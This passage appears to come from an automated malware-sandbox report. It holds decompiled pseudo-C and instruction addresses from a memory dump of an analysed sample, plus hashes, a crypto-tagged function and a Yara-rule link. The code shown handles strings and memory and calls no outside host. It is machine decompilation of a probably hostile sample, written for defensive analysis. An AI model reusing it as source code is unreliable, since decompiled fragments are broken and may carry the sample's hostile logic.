														return 0;
													}
												}
												goto L95;
											}
											_v348 = _t1044;
											_t1045 = 0;
											__eflags = 0;
											_v344 = _t1545;
											_t1466 = _v348;
											_t813 = _t1545;
											while(1) {
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												asm("pxor xmm1, xmm1");
												_v744 = 5;
												_v740 = _t813;
												_v736 = _t1466;
												_v732 = _v332;
												 *((intOrPtr*)(_t1576 + 0x18)) = _v216;
												_t1546 =  *((intOrPtr*)(_t1576 + 0x21c));
												_v724 =  *((intOrPtr*)(_t1576 + 0x21c));
												_t1507 =  *((intOrPtr*)(_t1576 + 0x220));
												 *((intOrPtr*)(_t1576 + 0x20)) =  *((intOrPtr*)(_t1576 + 0x220));
												asm("movq [esp+0x24], xmm1");
												asm("movq [esp+0x2c], xmm1");
												_t815 = E008C04B0( *((intOrPtr*)(_t1576 + 0x220)),  *((intOrPtr*)(_t1576 + 0x21c)));
												__eflags = _t815;
												if(_t815 == 0) {
													break;
												}
												_t1547 = 0;
												__eflags = 0;
												while(1) {
													_t813 = E0089CA10( &_v328, __eflags);
													__eflags = _t813 | _t1466;
													if((_t813 | _t1466) != 0) {
														break;
													}
													__eflags = _t1547 - 0x20;
													if(_t1547 == 0x20) {
														_t813 = 0xffffffff;
														_t1466 = 0xffffffff;
													} else {
														E008A22A0(0x5dc, _t1466);
														_t1547 = _t1547 + 1;
														continue;
													}
													break;
												}
												_t1549 = _t1466 - 0xffffffff;
												_t1510 = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												__eflags = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												if((_t813 - 0xffffffff | _t1466 - 0xffffffff) == 0) {
													E008B9510(_t1576 + 0x40);
													E0089E230(_t1576 + 0x128);
													E008C2530(_t1045,  &_v480, _t1466, _t1510, _t1549);
													E008B9510( &_v368);
													E008B9510( &_v384);
													E008B9510( &_v400);
													E008B9510( &_v200);
													E0089E2F0(_t1045,  &_v308, _t1569);
													E008B9510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t1045 = _t1045 + 1;
													__eflags = _t1045 - 0xa;
													if(_t1045 != 0xa) {
														continue;
													} else {
														E008B9510(_t1576 + 0x40);
														E0089E230(_t1576 + 0x128);
														E008C2530(_t1045,  &_v480, _t1466, _t1510, _t1549);
														E008B9510( &_v368);
														E008B9510( &_v384);
														E008B9510( &_v400);
														E008B9510( &_v200);
														E0089E2F0(_t1045,  &_v308, _t1569);
														E008B9510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_push(0);
											_t1467 = _v168;
											__eflags = _t1467;
											_t1468 =  !=  ? _t1467 + 0xc : _t1467;
											_push( !=  ? _t1467 + 0xc : _t1467);
											_t1047 = E008C1A80( !=  ? _t1467 + 0xc : _t1467, _t1467,  &_v480, 0x2710);
											E008B9510(_t1576 + 0x50);
											E0089E230(_t1576 + 0x138);
											E008C2530(_t1047,  &_v480,  !=  ? _t1467 + 0xc : _t1467, _t1507, _t1546);
											E008B9510( &_v368);
											E008B9510( &_v384);
											E008B9510( &_v400);
											E008B9510( &_v200);
											E0089E2F0(_t1047,  &_v308, _t1569);
											E008B9510( &_v324);
											__eflags = _t1047 - 1;
											_t465 = _t1047 - 1 > 0;
											__eflags = _t465;
											return 0 | _t465;
										} else {
											E0089E230( &_v432);
											E008C2530( &_v624, _t1576 + 0x110, _t1461, _t1504, _t1544);
											E008B9510( &_v344);
											E008B9510(_t1576 + 0x170);
											E008B9510( &_v376);
											E008B9510( &_v176);
											E0089E2F0( &_v624,  &_v284, _t1569);
											E008B9510( &_v300);
											__eflags = 0;
											return 0;
										}
									}
								}
							}
						} else {
							goto L6;
						}
					}
				} else {
					E008B9510(_t1572 + 0x228);
					E0089E2F0(_t1027,  &_v180, _t1569);
					E008B9510( &_v196);
					return 0;
				}
				L95:
			}

0x0089acd9
0x0089acdf
0x0089ace3
0x0089acf4
0x0089acf7
0x0089acfc
0x0089ad05
0x0089ad0c
0x0089ad13
0x0089ad1b
0x0089ad20
0x0089ad29
0x0089ad2e
0x0089ad3d
0x0089ad41
0x0089ad57
0x0089ad73
0x0089ad78
0x0089ad84
0x0089ad88
0x0089ad8b
0x0089ad93
0x0089ada9
0x0089adc5
0x0089adca
0x0089add6
0x0089adda
0x0089addd
0x0089ade5
0x0089adfb
0x0089ae17
0x0089ae1c
0x0089ae28
0x0089ae2c
0x0089ae2f
0x0089ae37
0x0089ae4d
0x0089ae69
0x0089ae6e
0x0089ae7a
0x0089ae7e
0x0089ae81
0x0089ae89
0x0089ae9f
0x0089aebb
0x0089aec0
0x0089aecc
0x0089aed0
0x0089aed3
0x0089aedb
0x0089aef1
0x0089af0d
0x0089af12
0x0089af23
0x0089af26
0x0089af34
0x0089af39
0x0089af3e
0x0089af50
0x0089af55
0x0089af5a
0x0089af6c
0x0089af71
0x0089af76
0x0089af88
0x0089af8d
0x0089af92
0x0089afa4
0x0089afa9
0x0089afae
0x0089afc0
0x0089afc5
0x0089afd1
0x0089afd6
0x0089afeb
0x0089aff0
0x0089aff9
0x0089b002
0x0089b039
0x0089b042
0x0089b05f
0x0089b072
0x0089b077
0x0089b07c
0x0089c89d
0x0089c8a0
0x0089c8a4
0x0089c8a6
0x0089c8aa
0x0089c8af
0x0089c8d5
0x0089c8e1
0x0089c8e9
0x0089c8f5
0x0089c903
0x0089c908
0x0089c90e
0x00000000
0x0089c914
0x0089c914
0x0089c920
0x0089c924
0x0089c928
0x0089c92a
0x00000000
0x0089c930
0x0089c930
0x0089c935
0x00000000
0x0089c93b
0x0089c93b
0x0089c946
0x0089c954
0x0089c967
0x0089c96c
0x0089c978
0x0089c980
0x0089c98c
0x0089c99f
0x0089c9a1
0x0089c9ab
0x0089c9b5
0x0089c9b8
0x0089c9c0
0x0089c9c2
0x0089c9c6
0x0089c9c8
0x0089c9cc
0x0089c9cc
0x0089c9ce
0x0089c9d2
0x0089c9d2
0x0089c9d3
0x0089c9d7
0x0089c9db
0x0089c9de
0x0089c9e1
0x00000000
0x00000000
0x0089c9e3
0x0089c9e7
0x0089c9ea
0x00000000
0x00000000
0x00000000
0x0089c9ea
0x0089c9ec
0x0089c9ec
0x0089c9f7
0x0089c9ff
0x0089c9ff
0x0089c935
0x0089c92a
0x0089b082
0x0089b082
0x0089b082
0x0089b08b
0x0089b08b
0x0089b097
0x0089b0a3
0x0089b0a8
0x0089b0b7
0x0089b0bb
0x0089b0d1
0x0089b0ed
0x0089b0f2
0x0089b0fe
0x0089b102
0x0089b105
0x0089b10d
0x0089b123
0x0089b13f
0x0089b144
0x0089b150
0x0089b154
0x0089b157
0x0089b15f
0x0089b175
0x0089b191
0x0089b196
0x0089b19b
0x0089b19e
0x0089b1aa
0x0089b1b9
0x0089b1be
0x0089b1c2
0x0089b1d0
0x0089b1d5
0x0089b1da
0x0089b1ec
0x0089b1f1
0x0089b1f6
0x0089b20d
0x0089b215
0x0089b21c
0x0089b223
0x0089b22c
0x0089b231
0x0089b23a
0x0089b246
0x0089b248
0x0089b24f
0x0089b262
0x0089b269
0x0089b282
0x0089b290
0x0089b2a7
0x0089b2ac
0x0089b2bb
0x0089b2c2
0x0089b2d2
0x0089b2d9
0x0089b2ee
0x0089b2f3
0x0089b2fa
0x0089b303
0x0089b30a
0x0089b319
0x0089b320
0x0089b32c
0x0089b338
0x0089b344
0x0089b350
0x0089b35c
0x0089b361
0x0089b36f
0x0089b30c
0x0089b313
0x0089b317
0x0089b37e
0x0089b383
0x0089b38b
0x0089b399
0x0089b39a
0x0089b39b
0x0089b3a4
0x0089b3ab
0x0089b3b5
0x0089b3bf
0x0089b3c9
0x0089b3d5
0x0089b3d6
0x0089b3dd
0x0089b3e1
0x0089b3e5
0x0089b3f3
0x0089b401
0x0089b402
0x0089b40a
0x0089b40e
0x0089b412
0x0089b420
0x0089b433
0x0089b434
0x0089b438
0x0089b43c
0x0089b440
0x0089b460
0x0089b46c
0x0089b476
0x0089b47c
0x0089b482
0x0089b487
0x0089b496
0x0089b49a
0x0089b4b0
0x0089b4cc
0x0089b4d1
0x0089b4dd
0x0089b4e1
0x0089b4e4
0x0089b4ec
0x0089b502
0x0089b51e
0x0089b523
0x0089b52f
0x0089b533
0x0089b536
0x0089b53e
0x0089b554
0x0089b570
0x0089b575
0x0089b581
0x0089b585
0x0089b588
0x0089b590
0x0089b5a6
0x0089b5c2
0x0089b5c7
0x0089b5d3
0x0089b5d7
0x0089b5da
0x0089b5e2
0x0089b5f8
0x0089b614
0x0089b619
0x0089b625
0x0089b629
0x0089b62c
0x0089b634
0x0089b64a
0x0089b666
0x0089b66b
0x0089b677
0x0089b67b
0x0089b67e
0x0089b686
0x0089b69c
0x0089b6b8
0x0089b6bd
0x0089b6c9
0x0089b6cd
0x0089b6d0
0x0089b6d8
0x0089b6ee
0x0089b70a
0x0089b70f
0x0089b714
0x0089b720
0x0089b723
0x0089b731
0x0089b736
0x0089b73b
0x0089b74a
0x0089b74f
0x0089b754
0x0089b763
0x0089b768
0x0089b76d
0x0089b77f
0x0089b784
0x0089b789
0x0089b79b
0x0089b7a0
0x0089b7a5
0x0089b7b7
0x0089b7bc
0x0089b7c1
0x0089b7d3
0x0089b7d8
0x0089b7dd
0x0089b7ef
0x0089b7f4
0x0089b800
0x0089b808
0x0089b80d
0x0089b814
0x0089b824
0x0089b826
0x0089b828
0x0089c829
0x0089c835
0x0089c841
0x0089c84d
0x0089c859
0x0089c865
0x0089c871
0x0089c87d
0x0089c882
0x0089c890
0x0089b82e
0x0089b835
0x0089b835
0x0089b83c
0x0089ba4c
0x0089ba50
0x0089ba50
0x0089ba52
0x0089ba56
0x0089ba56
0x0089ba5f
0x0089ba71
0x0089ba85
0x0089ba93
0x0089baa6
0x0089bab2
0x0089babe
0x0089bac3
0x0089bad1
0x0089bad7
0x0089badc
0x0089bade
0x0089bb91
0x0089bb91
0x0089bb9a
0x0089bb9f
0x0089bba3
0x0089bbb2
0x0089bbbd
0x0089bbc6
0x0089bbca
0x0089bbd0
0x0089bbd7
0x0089bbdb
0x0089bbe2
0x0089bbe6
0x0089bbec
0x0089bbf2
0x0089bbf7
0x0089bbf9
0x0089bc7d
0x0089bc89
0x0089bc9d
0x0089bca4
0x0089bcb0
0x0089bcb7
0x0089c815
0x0089c819
0x00000000
0x0089bcbd
0x0089bcc4
0x0089bcc9
0x0089bcd0
0x0089bce0
0x0089bce2
0x0089bce4
0x0089c7ab
0x0089c7b7
0x0089c7c3
0x0089c7cf
0x0089c7db
0x0089c7e7
0x0089c7f3
0x0089c7ff
0x0089c804
0x0089c812
0x00000000
0x00000000
0x00000000
0x0089bce4
0x00000000
0x00000000
0x00000000
0x0089bae4
0x0089bae4
0x0089bae6
0x0089baea
0x0089baec
0x0089baee
0x0089baf6
0x0089bafb
0x0089bb04
0x0089bb09
0x0089bb18
0x0089bb23
0x0089bb2c
0x0089bb30
0x0089bb33
0x0089bb39
0x0089bb41
0x0089bb45
0x0089bb49
0x0089bb4d
0x0089bb55
0x0089bb5b
0x0089bb60
0x0089bb62
0x00000000
0x00000000
0x0089bb6d
0x0089bb72
0x0089bb7c
0x0089bb7f
0x0089bb80
0x0089bb85
0x0089bb87
0x00000000
0x0089bb8d
0x0089bb8d
0x00000000
0x0089bb8d
0x00000000
0x0089bb87
0x0089bbfb
0x0089bc02
0x0089bc0e
0x0089bc1a
0x0089bc26
0x0089bc32
0x0089bc3e
0x0089bc4a
0x0089bc56
0x0089bc62
0x0089bc67
0x0089bc75
0x0089bc75
0x00000000
0x0089bcea
0x0089bcea
0x0089bceb
0x0089bceb
0x0089bcfb
0x0089bd07
0x0089bd13
0x0089bd1f
0x0089bd2b
0x0089bd37
0x0089bd43
0x0089bd4f
0x0089bd54
0x0089bd62
0x0089b842
0x0089b842
0x0089b842
0x0089b846
0x0089b846
0x0089b848
0x0089b84c
0x0089b853
0x0089b85a
0x0089b85a
0x0089b863
0x0089b86c
0x0089b870
0x0089b875
0x0089b87d
0x0089b881
0x0089b885
0x0089b892
0x0089b89d
0x0089b8a5
0x0089b8a9
0x0089b8af
0x0089b8b5
0x0089b8ba
0x0089b8bc
0x00000000
0x00000000
0x0089b8ce
0x0089b8d0
0x0089b8dd
0x0089b8df
0x0089b8e1
0x0089bd6c
0x0089bd78
0x0089bd84
0x0089bd90
0x0089bd9c
0x0089bda8
0x0089bdb4
0x0089bdc0
0x0089bdc5
0x0089bdd3
0x0089b8e7
0x0089b8e7
0x0089b8e8
0x0089b8eb
0x00000000
0x0089b8f1
0x0089b8f8
0x0089b904
0x0089b910
0x0089b91c
0x0089b928
0x0089b934
0x0089b940
0x0089b94c
0x0089b951
0x0089b95f
0x0089b95f
0x0089b8eb
0x00000000
0x0089b8e1
0x0089b962
0x0089b969
0x0089b969
0x0089b96b
0x0089b972
0x0089b979
0x0089b980
0x0089b980
0x0089b985
0x0089b98c
0x0089b993
0x0089b994
0x0089b99c
0x0089b9a8
0x0089b9aa
0x00000000
0x00000000
0x0089b9bc
0x0089b9be
0x0089b9cb
0x0089b9cd
0x0089b9cf
0x0089bddd
0x0089bde9
0x0089bdf5
0x0089be01
0x0089be0d
0x0089be19
0x0089be25
0x0089be31
0x0089be36
0x0089be44
0x0089b9d5
0x0089b9d5
0x0089b9d6
0x0089b9d9
0x00000000
0x0089b9db
0x0089b9e2
0x0089b9ee
0x0089b9fa
0x0089ba06
0x0089ba12
0x0089ba1e
0x0089ba2a
0x0089ba36
0x0089ba3b
0x0089ba49
0x0089ba49
0x0089b9d9
0x00000000
0x0089b9cf
0x0089be47
0x0089be58
0x0089be5c
0x0089be5d
0x0089be61
0x0089be65
0x0089be6b
0x0089be6f
0x0089be75
0x0089be79
0x0089be7d
0x0089be82
0x0089be89
0x0089be8c
0x0089be91
0x0089be99
0x0089be9d
0x0089bea2
0x0089bea4
0x0089c73a
0x0089c746
0x0089c752
0x0089c75e
0x0089c76a
0x0089c776
0x0089c782
0x0089c78e
0x0089c793
0x0089c7a1
0x0089beaa
0x0089beaa
0x0089beac
0x0089beb0
0x0089beb4
0x0089bebb
0x0089bebf
0x0089bec6
0x0089bec6
0x0089bec6
0x0089becf
0x0089bed4
0x0089bed8
0x0089bee0
0x0089beeb
0x0089bef4
0x0089bef8
0x0089befe
0x0089bf02
0x0089bf06
0x0089bf0c
0x0089bf12
0x0089bf18
0x0089bf1d
0x0089bf1f
0x00000000
0x00000000
0x0089bf21
0x0089bf21
0x0089bf23
0x0089bf2a
0x0089bf2f
0x0089bf33
0x0089bf33
0x0089bf35
0x00000000
0x00000000
0x0089bf3b
0x0089bf3e
0x0089bfde
0x0089bfe3
0x0089bf44
0x0089bf49
0x0089bf4e
0x00000000
0x0089bf4e
0x0089bfea
0x0089bffc
0x0089bffe
0x0089c08e
0x0089c09a
0x0089c0a6
0x0089c0b2
0x0089c0be
0x0089c0ca
0x0089c0d6
0x0089c0e2
0x0089c0e7
0x0089c0f5
0x0089c004
0x0089c008
0x0089c009
0x0089c00d
0x0089c010
0x00000000
0x0089c016
0x0089c01d
0x0089c029
0x0089c035
0x0089c041
0x0089c04d
0x0089c059
0x0089c065
0x0089c071
0x0089c076
0x0089c084
0x0089c084
0x0089c010
0x00000000
0x0089bffe
0x0089c0f8
0x0089c0ff
0x00000000
0x0089c0ff
0x0089bf51
0x0089bf58
0x0089bf5a
0x0089bf61
0x0089bf68
0x0089bf6c
0x0089bf75
0x0089bf7a
0x0089bf88
0x0089bf89
0x0089bf8d
0x0089bf94
0x0089bf95
0x0089bf96
0x0089bfa4
0x0089bfa6
0x00000000
0x00000000
0x0089bfac
0x0089bfac
0x0089bfae
0x0089bfba
0x0089bfbc
0x0089bfc0
0x0089bfc2
0x00000000
0x00000000
0x0089bfc8
0x0089bfcb
0x0089c106
0x0089c10b
0x0089bfd1
0x0089bfd6
0x0089bfdb
0x00000000
0x0089bfdb
0x00000000
0x0089bfcb
0x0089c118
0x0089c11a
0x0089c11c
0x0089c1ac
0x0089c1b8
0x0089c1c4
0x0089c1d0
0x0089c1dc
0x0089c1e8
0x0089c1f4
0x0089c200
0x0089c205
0x0089c213
0x0089c122
0x0089c126
0x0089c127
0x0089c12b
0x0089c12e
0x00000000
0x0089c134
0x0089c13b
0x0089c147
0x0089c153
0x0089c15f
0x0089c16b
0x0089c177
0x0089c183
0x0089c18f
0x0089c194
0x0089c1a2
0x0089c1a2
0x0089c12e
0x00000000
0x0089c11c
0x0089c216
0x0089c21d
0x0089c221
0x0089c227
0x0089c236
0x0089c23a
0x0089c23f
0x0089c241
0x0089c2b4
0x0089c2ba
0x0089c2bf
0x0089c2cf
0x0089c2e8
0x0089c2f1
0x0089c2fd
0x0089c309
0x0089c311
0x0089c314
0x0089c317
0x0089c328
0x0089c32d
0x0089c32f
0x0089c333
0x0089c33a
0x0089c341
0x0089c347
0x0089c357
0x0089c358
0x0089c35f
0x0089c366
0x0089c367
0x0089c368
0x0089c371
0x0089c376
0x0089c378
0x00000000
0x00000000
0x0089c37e
0x0089c37e
0x0089c380
0x0089c38c
0x0089c38e
0x0089c392
0x0089c394
0x00000000
0x00000000
0x0089c396
0x0089c399
0x0089c3a8
0x0089c3ad
0x0089c39b
0x0089c3a0
0x0089c3a5
0x00000000
0x0089c3a5
0x00000000
0x0089c399
0x0089c3ba
0x0089c3bc
0x0089c3be
0x0089c454
0x0089c460
0x0089c46c
0x0089c478
0x0089c484
0x0089c490
0x0089c49c
0x0089c4a8
0x0089c4b4
0x0089c4b9
0x0089c4c7
0x0089c3c4
0x0089c3c8
0x0089c3c9
0x0089c3cd
0x0089c3d0
0x00000000
0x0089c3d6
0x0089c3da
0x0089c3e6
0x0089c3f2
0x0089c3fe
0x0089c40a
0x0089c416
0x0089c422
0x0089c42e
0x0089c43a
0x0089c43f
0x0089c44d
0x0089c44d
0x0089c3d0
0x00000000
0x0089c3be
0x0089c4ca
0x0089c4d1
0x0089c4d1
0x0089c4d3
0x0089c4da
0x0089c4e1
0x0089c4e3
0x0089c4e3
0x0089c4ec
0x0089c4f1
0x0089c4f5
0x0089c4fd
0x0089c501
0x0089c50c
0x0089c517
0x0089c51b
0x0089c522
0x0089c526
0x0089c52d
0x0089c531
0x0089c537
0x0089c53d
0x0089c542
0x0089c544
0x00000000
0x00000000
0x0089c5f3
0x0089c5f3
0x0089c5f5
0x0089c5fc
0x0089c603
0x0089c605
0x00000000
0x00000000
0x0089c607
0x0089c60a
0x0089c619
0x0089c61e
0x0089c60c
0x0089c611
0x0089c616
0x00000000
0x0089c616
0x00000000
0x0089c60a
0x0089c62b
0x0089c62d
0x0089c62d
0x0089c62f
0x0089c6bd
0x0089c6c9
0x0089c6d5
0x0089c6e1
0x0089c6ed
0x0089c6f9
0x0089c705
0x0089c711
0x0089c71d
0x0089c722
0x0089c730
0x0089c635
0x0089c635
0x0089c636
0x0089c639
0x00000000
0x0089c63f
0x0089c643
0x0089c64f
0x0089c65b
0x0089c667
0x0089c673
0x0089c67f
0x0089c68b
0x0089c697
0x0089c6a3
0x0089c6a8
0x0089c6b6
0x0089c6b6
0x0089c639
0x00000000
0x0089c62f
0x0089c54a
0x0089c54c
0x0089c553
0x0089c558
0x0089c55b
0x0089c56e
0x0089c577
0x0089c583
0x0089c58f
0x0089c59b
0x0089c5a7
0x0089c5b3
0x0089c5bf
0x0089c5cb
0x0089c5d7
0x0089c5de
0x0089c5e1
0x0089c5e1
0x0089c5f0
0x0089c243
0x0089c24a
0x0089c256
0x0089c262
0x0089c26e
0x0089c27a
0x0089c286
0x0089c292
0x0089c29e
0x0089c2a3
0x0089c2b1
0x0089c2b1
0x0089c241
0x0089bea4
0x0089b83c
0x00000000
0x00000000
0x00000000
0x0089b317
0x0089b004
0x0089b00b
0x0089b017
0x0089b023
0x0089b036
0x0089b036
0x00000000

Strings

ZFhj, xrefs: 0089B588

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: ZFhj
API String ID: 0-4053837889
Opcode ID: 8cd2e607a345591662a89da83eef1f70a03afbaed6a301b9acee246bad407704
Instruction ID: 68dcb5451fff284620f81326d9b34a9d22b67953cf9d37f2ddae03f45e2171ef
Opcode Fuzzy Hash: 8cd2e607a345591662a89da83eef1f70a03afbaed6a301b9acee246bad407704
Instruction Fuzzy Hash: 39E22F315183849AD335EB78D892AEFB3E4FFA6310F544A2DE5C982291EF306945CB53

Uniqueness

Uniqueness Score: -1.00%

Function 008B3EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E008B3EC0(signed int __ecx) {
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t368;
				unsigned int _t371;
				void* _t376;
				signed int* _t377;
				char* _t378;
				char _t381;
				signed int _t382;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t396;
				char* _t397;
				char _t400;
				char _t403;
				signed int _t404;
				signed int _t407;
				signed int _t410;
				signed int _t412;
				void* _t413;
				char* _t416;
				signed int _t418;
				unsigned int _t424;
				signed int _t425;
				char* _t431;
				signed int _t436;
				unsigned int _t442;
				char* _t445;
				void* _t447;
				char _t449;
				signed int _t450;
				signed int _t451;
				char* _t463;
				char _t477;
				char _t479;
				char _t481;
				char _t482;
				signed int _t483;
				signed int _t484;
				char _t491;
				signed int _t492;
				void* _t503;
				signed int _t508;
				unsigned int _t509;
				signed int _t511;
				signed int _t512;
				signed int _t520;
				char* _t521;
				char* _t522;
				char* _t523;
				signed int _t524;
				signed int _t527;
				char* _t535;
				signed int _t537;
				unsigned int _t543;
				signed int _t545;
				signed int _t546;
				char _t548;
				char _t549;
				char _t550;
				signed int _t551;
				signed int _t552;
				unsigned int _t556;
				void* _t565;
				signed int _t566;
				char* _t568;
				char _t569;
				char _t570;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				unsigned int _t575;
				char* _t576;
				char _t577;
				char _t578;
				char* _t583;
				char _t584;
				char _t585;
				signed int _t586;
				unsigned int _t592;
				void* _t595;
				signed int _t597;
				signed int _t600;
				char _t602;
				void* _t603;
				unsigned int _t604;
				signed int _t605;
				unsigned int _t610;
				signed int _t612;
				signed int _t614;
				char* _t615;
				char _t616;
				char _t617;
				char _t620;
				signed int _t621;
				void* _t624;
				signed int _t626;
				char _t629;
				signed int _t630;
				signed int _t636;
				signed int _t641;
				char* _t642;
				char _t644;
				signed int _t646;
				char _t649;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t655;
				signed int _t658;
				char* _t659;
				void* _t660;
				void* _t665;
				intOrPtr _t667;
				signed int _t672;
				signed int _t673;
				unsigned int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				unsigned int* _t683;
				signed int _t685;
				signed int _t686;
				void* _t688;
				signed int _t689;
				signed int _t693;
				signed int _t694;
				char* _t695;
				void* _t696;
				unsigned int _t697;
				signed int _t700;
				unsigned int _t702;
				signed int _t704;
				intOrPtr* _t705;
				signed int _t707;
				signed int _t714;
				void* _t720;
				signed int _t721;
				void* _t723;
				void* _t727;

				_t723 = (_t721 & 0xfffffff0) - 0x44;
				_t505 = __ecx;
				_t727 =  *__ecx;
				if(_t727 == 0) {
					return __ecx;
				} else {
					if(_t727 <= 0) {
						_v48 = 0;
						_t604 = 0;
						if( &_v52 == __ecx) {
							goto L288;
						} else {
							goto L287;
						}
					} else {
						_v64 = 0;
						asm("pxor xmm0, xmm0");
						_v40 = __ecx;
						do {
							_t410 = _v64 + 1;
							_t620 =  *0x8ca24c; // 0xa0d0920
							_t550 =  *0x8ca250; // 0x0
							_v64 = _t410;
							_v36 = _t620;
							_v32 = _t550;
							_t621 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t410 * 4 - 4));
							if(_t621 == 0) {
								_t680 = 0;
								_t412 = 0;
							} else {
								_t505 = _t621 & 0x0000000f;
								if(_t505 == 0) {
									L8:
									asm("pxor xmm1, xmm1");
									_t503 =  ~( ~_t505 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+ebx]");
										asm("pcmpeqb xmm0, xmm1");
										asm("pmovmskb ecx, xmm0");
										if(_t550 != 0) {
											break;
										}
										_t505 = _t505 + 0x10;
										if(_t505 < _t503) {
											continue;
										} else {
											if(_t503 >= 0x7fffffff) {
												L14:
												_t412 = 0x7fffffff;
												goto L15;
											} else {
												while( *((char*)(_t503 + _t621)) != 0) {
													_t503 = _t503 + 1;
													if(_t503 < 0x7fffffff) {
														continue;
													} else {
														goto L14;
													}
													goto L20;
												}
												goto L295;
											}
										}
										goto L20;
									}
									asm("bsf eax, ecx");
									_t412 = _t503 + _t505;
									goto L295;
								} else {
									_t412 = 0;
									_t505 =  ~_t505 + 0x10;
									while( *((char*)(_t412 + _t621)) != 0) {
										_t412 = _t412 + 1;
										if(_t412 < _t505) {
											continue;
										} else {
											goto L8;
										}
										goto L20;
									}
									L295:
									if(_t412 > 0) {
										L15:
										_t505 = _v36;
										_t680 = 0;
										while(_t505 != 0) {
											while(1) {
												_t720 = _t720 + 1;
												if(_t603 ==  *((intOrPtr*)(_t723 + _t720 + 0x2f))) {
													break;
												}
												if( *((char*)(_t723 + _t720 + 0x30)) != 0) {
													continue;
												}
												goto L20;
											}
											_t680 = _t680 + 1;
											if(_t680 < _t412) {
												continue;
											} else {
												goto L20;
											}
											goto L301;
										}
									} else {
										_t680 = 0;
									}
								}
							}
							L20:
							_t413 = _t412 - 1;
							_t700 = _t412 - _t680;
							if(_t413 >= _t680) {
								_v60 = 0;
								_t505 = _t413 - _t680 + 1;
								_v56 = _t680;
								_t602 = _v36;
								_t689 = _v60;
								_v48 = _t621;
								_v52 = _t505;
								while(_t602 != 0) {
									_t667 =  *((intOrPtr*)(_t413 + _v48));
									while(1) {
										_t505 = 1;
										if(_t667 ==  *((intOrPtr*)(_t723 + 0x30))) {
											break;
										}
										if( *((char*)(_t723 + 0x31)) != 0) {
											continue;
										}
										goto L26;
									}
									_t689 = _t689 + 1;
									_t413 = _t413 - 1;
									_t700 = _t700 - 1;
									if(_t689 < _v52) {
										continue;
									} else {
										break;
									}
									goto L301;
								}
								L26:
								_t621 = _v48;
								_t680 = _v56;
							}
							if(_t700 == 0) {
								L66:
								_push(0x40);
								_t505 = E008A1030();
								_t723 = _t723 + 4;
								 *_t505 = 0;
							} else {
								if(_t621 == 0) {
									_t483 = 0;
								} else {
									_t600 = _t621 & 0x0000000f;
									if(_t600 == 0) {
										L33:
										asm("pxor xmm1, xmm1");
										_t483 =  ~( ~_t600 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [edx+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ebx, xmm0");
											if(_t505 != 0) {
												break;
											}
											_t600 = _t600 + 0x10;
											if(_t600 < _t483) {
												continue;
											} else {
												if(_t483 >= 0x7fffffff) {
													L39:
													_t483 = 0x7fffffff;
												} else {
													while( *((char*)(_t483 + _t621)) != 0) {
														_t483 = _t483 + 1;
														if(_t483 < 0x7fffffff) {
															continue;
														} else {
															goto L39;
														}
														goto L40;
													}
												}
											}
											goto L40;
										}
										asm("bsf eax, ebx");
										_t483 = _t483 + _t600;
									} else {
										_t483 = 0;
										_t600 =  ~_t600 + 0x10;
										while( *((char*)(_t483 + _t621)) != 0) {
											_t483 = _t483 + 1;
											if(_t483 < _t600) {
												continue;
											} else {
												goto L33;
											}
											goto L40;
										}
									}
								}
								L40:
								_t687 =  <=  ? 0 : _t680;
								_t688 =  <  ? _t483 :  <=  ? 0 : _t680;
								_t484 = _t483 - _t688;
								if(_t700 < 0 || _t700 > _t484) {
									_t700 = _t484;
								}
								if(_t688 + _t621 == 0 ||  *(_t621 + _t688) == 0) {
									goto L66;
								} else {
									if(_t700 == 0) {
										_t492 = _t621 + _t688;
										_t597 = _t492 & 0x0000000f;
										if(_t597 == 0) {
											L50:
											asm("pxor xmm1, xmm1");
											_t700 =  ~( ~_t597 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm0, [eax+ecx]");
												asm("pcmpeqb xmm0, xmm1");
												asm("pmovmskb ebx, xmm0");
												if(_t505 != 0) {
													break;
												}
												_t597 = _t597 + 0x10;
												if(_t597 < _t700) {
													continue;
												} else {
													if(_t700 >= 0x7fffffff) {
														L56:
														_t700 = 0x7fffffff;
													} else {
														while( *((char*)(_t700 + _t492)) != 0) {
															_t700 = _t700 + 1;
															if(_t700 < 0x7fffffff) {
																continue;
															} else {
																goto L56;
															}
															goto L57;
														}
													}
												}
												goto L57;
											}
											asm("bsf esi, ebx");
											_t700 = _t700 + _t597;
										} else {
											_t700 = 0;
											_t597 =  ~_t597 + 0x10;
											while( *((char*)(_t700 + _t492)) != 0) {
												_t700 = _t700 + 1;
												if(_t700 < _t597) {
													continue;
												} else {
													goto L50;
												}
												goto L57;
											}
										}
									}
									L57:
									_t40 = _t700 + 1; // -2147483661
									_t511 =  <=  ? 0x40 : _t40;
									if(_t511 > 0) {
										_t592 = (_t511 >> 5 >> 0x1a) + _t511 >> 6;
										_t512 = _t511 & 0x8000003f;
										if(_t512 < 0) {
											_t512 = (_t512 - 0x00000001 | 0xffffffc0) + 1;
										}
										_push(_t592 + (0 | _t512 > 0x00000000) << 6);
										_v48 = _t621;
										_t505 = E008A1030();
										_t723 = _t723 + 4;
										_t665 = _v48 + _t688;
										_t595 = 0;
